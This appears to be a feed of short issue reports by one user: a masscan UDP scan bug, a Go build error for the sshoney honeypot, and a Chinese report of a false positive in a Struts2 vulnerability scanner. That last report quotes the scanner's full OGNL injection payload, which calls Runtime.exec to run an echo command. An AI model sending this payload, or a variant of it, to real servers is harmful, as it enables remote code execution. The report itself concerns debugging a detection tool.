Xyer
Xyer
First of all, thank you for your wonderful work, a little bug here.. Phenomenon: in host 10.10.10.10 when I scan 20.20.20.20 running a task like:`/bin/masscan --rate 10000 -pU:1-65535 20.20.20.20` at...
# go get -u github.com/ashmckenzie/sshoney go get: github.com/Sirupsen/logrus@none updating to github.com/Sirupsen/[email protected]: parsing go.mod: module declares its path as: github.com/sirupsen/logrus but was required as: github.com/Sirupsen/logrus can't build ...
ssh [email protected] -p 2222 root@localhost's password: Connection to 127.0.0.1 closed by remote host. Connection to 127.0.0.1 closed.
看工具判断逻辑是让服务器 echo 一个 哈希字符,看返回值是否有这个字符串来判断是否存在。 实际情况发现,目标可能出现 404 报错,把 poc 吐回来: message XXXXXXXXX.TEST&key=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%[email protected]@getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%[email protected]@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(key)(%27meh%27)] poc 被返回了: getRuntime().exec(%27echo%205ee2994195febadcf54bb3c3f88f02b3%27) 然后判断存在漏洞... 给加上一次判断吧